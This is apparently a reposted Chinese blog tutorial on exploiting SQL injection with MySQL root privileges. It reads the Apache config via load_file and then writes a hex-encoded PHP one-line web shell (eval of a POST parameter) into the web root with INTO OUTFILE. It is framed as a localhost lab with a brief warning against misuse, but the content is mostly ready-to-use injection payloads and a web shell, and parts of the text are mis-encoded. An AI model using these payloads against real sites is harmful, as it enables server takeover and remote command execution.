標簽：

首先我們的找到一個有注入的站：這里我用自己搭建的環(huán)境表示；大家不要亂來

http://localhost/pentest/sql/sql_injection_get.php?id=1

發(fā)現(xiàn)是root權(quán)限，我們嘗試直接寫馬

首先要找到網(wǎng)站的主目錄：

數(shù)據(jù)庫目錄：D:\wamp\bin\mysql\mysql5.5.20\data\

進行判斷，服務(wù)器可能為wampserver簡易版，httpd.conf文件在D:/wamp/bin/apache/Apache2.2.21/conf/httpd.conf

http://localhost/pentest/sql/sql_injection_get.php?id=1‘ and 1=2 union select 1,2,3 load_file(‘D:/wamp/bin/apache/Apache2.2.21/conf/httpd.conf‘) from user--+

如果這樣不成功，建議將目錄轉(zhuǎn)換為hex編碼進行：即 load_file(0x443A5C77616D705C62696E5C6170616368655C417061636865322E322E32315C636F6E665C68747470642E636F6E66)

找到了網(wǎng)站目錄：D:/wamp/www

我們嘗試寫：

http://localhost/pentest/sql/sql_injection_get.php?id=1‘ and 1=2 union select 1,2,0x3C3F706870206576616C28245F504F53545B27636D64275D293B3F3E into outfile ‘D:/wamp/www/xx.php‘ from user --+

<?php eval($_POST[‘cmd‘]);?>的hex編碼：0x3C3F706870206576616C28245F504F53545B27636D64275D293B3F3E

然后訪問：http://localhost/xx.php

標簽：

總結(jié)

以上是生活随笔為你收集整理的mysql root 权限注入_Mysql注入root权限直接写一句话马的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。